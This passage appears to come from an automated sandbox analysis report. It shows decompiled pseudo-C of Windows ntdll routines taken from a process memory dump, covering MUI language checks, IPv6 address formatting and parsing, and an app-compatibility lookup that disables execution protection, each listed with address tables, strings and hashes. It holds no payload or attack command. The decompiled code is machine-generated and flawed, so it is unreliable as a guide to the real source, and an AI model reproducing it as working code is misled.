				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E00AB718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E00A9E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00A92340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E00AAE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E00A9E2A8(_v12,  &_v68, _v16);
						if(E00AB5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E00AAE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E00A9E2A8(_t322,  &_v68, _t296);
						if(E00AB5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E00A9E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E00A9E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                              0x00ab8788
                                                              0x00ab8788
                                                              0x00ab8791
                                                              0x00ab8794
                                                              0x00ab8798
                                                              0x00ab879b
                                                              0x00ab879e
                                                              0x00ab87a1
                                                              0x00ab87a4
                                                              0x00ab87a7
                                                              0x00ab87aa
                                                              0x00ab87af
                                                              0x00b01ad3
                                                              0x00ab8b0a
                                                              0x00ab8b0d
                                                              0x00ab8b13
                                                              0x00ab8b19
                                                              0x00ab8b1f
                                                              0x00ab8b25
                                                              0x00ab8b2b
                                                              0x00ab8b31
                                                              0x00ab8b37
                                                              0x00ab8b3d
                                                              0x00ab8b46
                                                              0x00ab8b46
                                                              0x00ab87c6
                                                              0x00ab87d0
                                                              0x00b01ae0
                                                              0x00b01ae6
                                                              0x00b01af8
                                                              0x00b01af8
                                                              0x00b01afd
                                                              0x00b01afe
                                                              0x00b01b01
                                                              0x00b01b06
                                                              0x00b01b06
                                                              0x00ab87d6
                                                              0x00ab87f2
                                                              0x00ab87f7
                                                              0x00ab8807
                                                              0x00ab880a
                                                              0x00ab880f
                                                              0x00ab8810
                                                              0x00ab8813
                                                              0x00ab8818
                                                              0x00ab8818
                                                              0x00ab882c
                                                              0x00ab8831
                                                              0x00ab8838
                                                              0x00ab8908
                                                              0x00ab8920
                                                              0x00ab89f0
                                                              0x00ab8a08
                                                              0x00ab8af6
                                                              0x00ab8af6
                                                              0x00ab8af8
                                                              0x00ab8afb
                                                              0x00b01beb
                                                              0x00b01beb
                                                              0x00ab8b04
                                                              0x00b01bf8
                                                              0x00b01c0e
                                                              0x00b01c13
                                                              0x00b01c16
                                                              0x00b01c16
                                                              0x00b01bf8
                                                              0x00000000
                                                              0x00ab8b04
                                                              0x00ab8a0e
                                                              0x00ab8a11
                                                              0x00ab8a14
                                                              0x00ab8a15
                                                              0x00ab8a18
                                                              0x00ab8a22
                                                              0x00ab8b59
                                                              0x00ab8a28
                                                              0x00ab8a3c
                                                              0x00ab8a3c
                                                              0x00ab8a42
                                                              0x00b01bb0
                                                              0x00b01b11
                                                              0x00b01b11
                                                              0x00000000
                                                              0x00ab8a48
                                                              0x00ab8a51
                                                              0x00ab8a5b
                                                              0x00ab8a5e
                                                              0x00ab8a61
                                                              0x00ab8a69
                                                              0x00ab8a69
                                                              0x00ab8a6d
                                                              0x00000000
                                                              0x00000000
                                                              0x00ab8a74
                                                              0x00ab8a7c
                                                              0x00ab8a7d
                                                              0x00ab8a91
                                                              0x00ab8a93
                                                              0x00ab8a93
                                                              0x00ab8a98
                                                              0x00ab8a9b
                                                              0x00ab8aa1
                                                              0x00ab8aa1
                                                              0x00ab8aa4
                                                              0x00ab8aaa
                                                              0x00ab8ab1
                                                              0x00ab8ac5
                                                              0x00ab8ac7
                                                              0x00ab8ac7
                                                              0x00ab8ac5
                                                              0x00ab8ace
                                                              0x00b01bc9
                                                              0x00b01bce
                                                              0x00b01bd2
                                                              0x00b01bd2
                                                              0x00ab8ad8
                                                              0x00ab8aeb
                                                              0x00ab8aeb
                                                              0x00ab8af0
                                                              0x00ab8af4
                                                              0x00000000
                                                              0x00ab8af4
                                                              0x00ab8a42
                                                              0x00ab8926
                                                              0x00ab8929
                                                              0x00ab892c
                                                              0x00ab892d
                                                              0x00ab8930
                                                              0x00ab8935
                                                              0x00ab893a
                                                              0x00ab8b51
                                                              0x00ab8940
                                                              0x00ab8954
                                                              0x00ab8954
                                                              0x00ab895a
                                                              0x00b01b63
                                                              0x00000000
                                                              0x00ab8960
                                                              0x00ab8969
                                                              0x00ab8973
                                                              0x00ab8976
                                                              0x00ab8979
                                                              0x00ab897e
                                                              0x00ab8981
                                                              0x00ab8981
                                                              0x00ab8986
                                                              0x00000000
                                                              0x00000000
                                                              0x00b01b6e
                                                              0x00b01b74
                                                              0x00b01b7b
                                                              0x00b01b8f
                                                              0x00b01b91
                                                              0x00b01b91
                                                              0x00b01b99
                                                              0x00b01b9c
                                                              0x00b01ba2
                                                              0x00b01ba2
                                                              0x00ab898c
                                                              0x00ab8992
                                                              0x00ab8999
                                                              0x00ab89ad
                                                              0x00b01ba8
                                                              0x00b01ba8
                                                              0x00ab89ad
                                                              0x00ab89b6
                                                              0x00ab89c8
                                                              0x00ab89cd
                                                              0x00ab89d0
                                                              0x00ab89d0
                                                              0x00ab89d6
                                                              0x00ab89e8
                                                              0x00ab89e8
                                                              0x00ab89ed
                                                              0x00000000
                                                              0x00ab89ed
                                                              0x00ab895a
                                                              0x00ab883e
                                                              0x00ab8841
                                                              0x00ab8844
                                                              0x00ab8845
                                                              0x00ab8848
                                                              0x00ab884d
                                                              0x00ab8852
                                                              0x00ab8b49
                                                              0x00ab8858
                                                              0x00ab886c
                                                              0x00ab886c
                                                              0x00ab8872
                                                              0x00b01b0e
                                                              0x00000000
                                                              0x00ab8878
                                                              0x00ab8881
                                                              0x00ab888b
                                                              0x00ab888e
                                                              0x00ab8891
                                                              0x00ab8896
                                                              0x00ab8899
                                                              0x00ab8899
                                                              0x00ab889e
                                                              0x00000000
                                                              0x00000000
                                                              0x00b01b21
                                                              0x00b01b27
                                                              0x00b01b2e
                                                              0x00b01b42
                                                              0x00b01b44
                                                              0x00b01b44
                                                              0x00b01b4c
                                                              0x00b01b4f
                                                              0x00b01b55
                                                              0x00b01b55
                                                              0x00ab88a4
                                                              0x00ab88aa
                                                              0x00ab88b1
                                                              0x00ab88c5
                                                              0x00b01b5b
                                                              0x00b01b5b
                                                              0x00ab88c5
                                                              0x00ab88ce
                                                              0x00ab88e0
                                                              0x00ab88e5
                                                              0x00ab88e8
                                                              0x00ab88e8
                                                              0x00ab88ee
                                                              0x00ab8900
                                                              0x00ab8900
                                                              0x00ab8905
                                                              0x00000000
                                                              0x00ab8905

                                                              APIs
                                                              Strings
                                                              • Kernel-MUI-Language-Disallowed, xrefs: 00AB8914
                                                              • Kernel-MUI-Language-Allowed, xrefs: 00AB8827
                                                              • Kernel-MUI-Number-Allowed, xrefs: 00AB87E6
                                                              • Kernel-MUI-Language-SKU, xrefs: 00AB89FC
                                                              • WindowsExcludedProcs, xrefs: 00AB87C1
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2344141769.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000007.00000002.2344136748.0000000000A70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344242690.0000000000B60000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344249896.0000000000B70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344257705.0000000000B74000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344263581.0000000000B77000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344275659.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344323111.0000000000BE0000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: _wcspbrk
                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                              • API String ID: 402402107-258546922
                                                              • Opcode ID: 390cfeed30c18dddca763cb40f6a5927edf50dcaa3da8a75ddd761fc214e50d9
                                                              • Instruction ID: 59cd9e3976bd37492c93a86fbbf6917b8b3323d22a616b77c874ab6d23557c66
                                                              • Opcode Fuzzy Hash: 390cfeed30c18dddca763cb40f6a5927edf50dcaa3da8a75ddd761fc214e50d9
                                                              • Instruction Fuzzy Hash: B0F1C6B2D00209EFCF11DF99CA819EEBBFDFB08300F15456AE505A7252EB359A45DB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AD13CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 38%
                                                              			E00AD13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00AC7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0xa92926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00AC7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0xa99cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00AC7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00AC7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00AC7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00AC7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                              0x00ad13d5
                                                              0x00ad13d9
                                                              0x00ad13dc
                                                              0x00ad13de
                                                              0x00ad13e1
                                                              0x00ad13e8
                                                              0x00ad13ee
                                                              0x00afe8fd
                                                              0x00000000
                                                              0x00afe921
                                                              0x00afe921
                                                              0x00afe928
                                                              0x00afe982
                                                              0x00afe98a
                                                              0x00000000
                                                              0x00afe99a
                                                              0x00afe99e
                                                              0x00afe9a3
                                                              0x00afe9a8
                                                              0x00afe9b9
                                                              0x00afe978
                                                              0x00000000
                                                              0x00afe978
                                                              0x00afe98a
                                                              0x00afe92a
                                                              0x00afe931
                                                              0x00afe944
                                                              0x00afe944
                                                              0x00afe950
                                                              0x00afe954
                                                              0x00afe959
                                                              0x00afe95e
                                                              0x00afe963
                                                              0x00afe970
                                                              0x00000000
                                                              0x00afe975
                                                              0x00afe93b
                                                              0x00afe980
                                                              0x00000000
                                                              0x00afe980
                                                              0x00afe942
                                                              0x00afe94b
                                                              0x00000000
                                                              0x00afe94b
                                                              0x00000000
                                                              0x00afe942
                                                              0x00ad13f4
                                                              0x00ad13f4
                                                              0x00ad13f9
                                                              0x00ad13fc
                                                              0x00ad13ff
                                                              0x00ad1406
                                                              0x00afe9cc
                                                              0x00afe9d2
                                                              0x00afe9d2
                                                              0x00afe9cc
                                                              0x00ad140c
                                                              0x00ad1411
                                                              0x00ad1431
                                                              0x00ad143a
                                                              0x00ad143c
                                                              0x00ad143f
                                                              0x00ad143f
                                                              0x00ad1442
                                                              0x00ad1447
                                                              0x00ad14a8
                                                              0x00ad14ac
                                                              0x00afe9e2
                                                              0x00afe9e7
                                                              0x00afe9ec
                                                              0x00afea05
                                                              0x00afea05
                                                              0x00000000
                                                              0x00ad1449
                                                              0x00000000
                                                              0x00ad1449
                                                              0x00ad144c
                                                              0x00ad1459
                                                              0x00ad1462
                                                              0x00ad1469
                                                              0x00ad146a
                                                              0x00ad1470
                                                              0x00ad1473
                                                              0x00ad1476
                                                              0x00ad1476
                                                              0x00ad1490
                                                              0x00ad1495
                                                              0x00ad138e
                                                              0x00ad1390
                                                              0x00ad1397
                                                              0x00ad1398
                                                              0x00ad1399
                                                              0x00ad13a1
                                                              0x00ad13a4
                                                              0x00ad13a4
                                                              0x00ad1498
                                                              0x00ad149c
                                                              0x00ad149f
                                                              0x00ad14a2
                                                              0x00000000
                                                              0x00000000
                                                              0x00ad14a4
                                                              0x00000000
                                                              0x00ad14a4
                                                              0x00ad1413
                                                              0x00ad1415
                                                              0x00ad1416
                                                              0x00ad1419
                                                              0x00ad141c
                                                              0x00ad1422
                                                              0x00ad13b7
                                                              0x00ad13bc
                                                              0x00ad13bf
                                                              0x00ad13bf
                                                              0x00ad13c2
                                                              0x00ad1424
                                                              0x00ad1424
                                                              0x00ad1424
                                                              0x00ad1427
                                                              0x00ad142b
                                                              0x00ad142c
                                                              0x00ad142c
                                                              0x00ad142c
                                                              0x00000000
                                                              0x00ad141c
                                                              0x00ad1411

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2344141769.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000007.00000002.2344136748.0000000000A70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344242690.0000000000B60000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344249896.0000000000B70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344257705.0000000000B74000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344263581.0000000000B77000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344275659.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344323111.0000000000BE0000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 04598611dfbf8fc6e6f5dc035ae7c422898f4749e5145ee7a5396cde820ba6d5
                                                              • Instruction ID: 4dfb7f8de540df7a903ecac461e7bf9b73ac6c8e1c49688a5e0d05e6d987776c
                                                              • Opcode Fuzzy Hash: 04598611dfbf8fc6e6f5dc035ae7c422898f4749e5145ee7a5396cde820ba6d5
                                                              • Instruction Fuzzy Hash: E461F3F1A04659BACF34DFA9C8808BFBBF5EF94300B54C52EF59647641D274AA40DBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AC7EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 64%
                                                              			E00AC7EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0xb72088; // 0x776dd4b6
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00AC7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00AE3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E00A9DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0xb74218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00AE3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00AA0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00AE3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00AA8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00AE3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E00B0E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00AE3F92();
					_t38 = 1;
					L2:
					return E00A9E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                              0x00ac7f08
                                                              0x00ac7f0f
                                                              0x00ac7f12
                                                              0x00ac7f1b
                                                              0x00ac7f31
                                                              0x00ae3ead
                                                              0x00ae3eb4
                                                              0x00000000
                                                              0x00000000
                                                              0x00ae3eba
                                                              0x00ae3ecd
                                                              0x00ae3ed2
                                                              0x00ae3ee1
                                                              0x00ae3ee7
                                                              0x00ae3eec
                                                              0x00ae3f12
                                                              0x00ae3f18
                                                              0x00ae3f1a
                                                              0x00000000
                                                              0x00000000
                                                              0x00ae3f20
                                                              0x00ae3f26
                                                              0x00ae3f28
                                                              0x00000000
                                                              0x00000000
                                                              0x00ae3f2e
                                                              0x00ae3f30
                                                              0x00000000
                                                              0x00000000
                                                              0x00ae3f3a
                                                              0x00ae3f3b
                                                              0x00ae3f53
                                                              0x00ae3f64
                                                              0x00ae3f69
                                                              0x00ae3f6c
                                                              0x00ae3f6d
                                                              0x00ae3f6f
                                                              0x00aee304
                                                              0x00aee30f
                                                              0x00aee315
                                                              0x00aee31e
                                                              0x00aee321
                                                              0x00aee327
                                                              0x00aee329
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00aee32f
                                                              0x00aee32f
                                                              0x00aee337
                                                              0x00aee33a
                                                              0x00aee33b
                                                              0x00aee33d
                                                              0x00aee33f
                                                              0x00aee341
                                                              0x00aee341
                                                              0x00aee34e
                                                              0x00aee353
                                                              0x00aee358
                                                              0x00aee35d
                                                              0x00aee35f
                                                              0x00000000
                                                              0x00000000
                                                              0x00aee365
                                                              0x00aee365
                                                              0x00aee368
                                                              0x00aee36e
                                                              0x00000000
                                                              0x00000000
                                                              0x00aee374
                                                              0x00aee32f
                                                              0x00ae3f75
                                                              0x00ae3f7a
                                                              0x00ae3f7c
                                                              0x00ae3f7e
                                                              0x00ae3f86
                                                              0x00ac7f39
                                                              0x00ac7f47
                                                              0x00ac7f47
                                                              0x00ac7f37
                                                              0x00ac7f37
                                                              0x00000000

                                                              APIs
                                                              • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00AE3F12
                                                              Strings
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00AEE2FB
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00AE3EC4
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 00AEE345
                                                              • Execute=1, xrefs: 00AE3F5E
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00AE3F4A
                                                              • ExecuteOptions, xrefs: 00AE3F04
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00AE3F75
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2344141769.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000007.00000002.2344136748.0000000000A70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344242690.0000000000B60000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344249896.0000000000B70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344257705.0000000000B74000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344263581.0000000000B77000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344275659.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344323111.0000000000BE0000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: BaseDataModuleQuery
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 3901378454-484625025
                                                              • Opcode ID: 7489a850f63642bc80e970bde8ce048c0ee29f2cf628c57c53f9db77ab9577e3
                                                              • Instruction ID: 72287aa82336355fac3ada804c5d90a5034f0a6f4f34408460f48bbbaf7fc8b3
                                                              • Opcode Fuzzy Hash: 7489a850f63642bc80e970bde8ce048c0ee29f2cf628c57c53f9db77ab9577e3
                                                              • Instruction Fuzzy Hash: 7D416572A4025D7ADF20DAA59CCAFDE73FCAB54700F0005ADB509A7191EA709A45CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AD0B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00AD0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00AA8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E00A9DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00AD0CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00AD0CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E00AD06BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E00AD06BA(_t135, _t178) == 0 || E00AD0A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00AD0CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00AD0CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
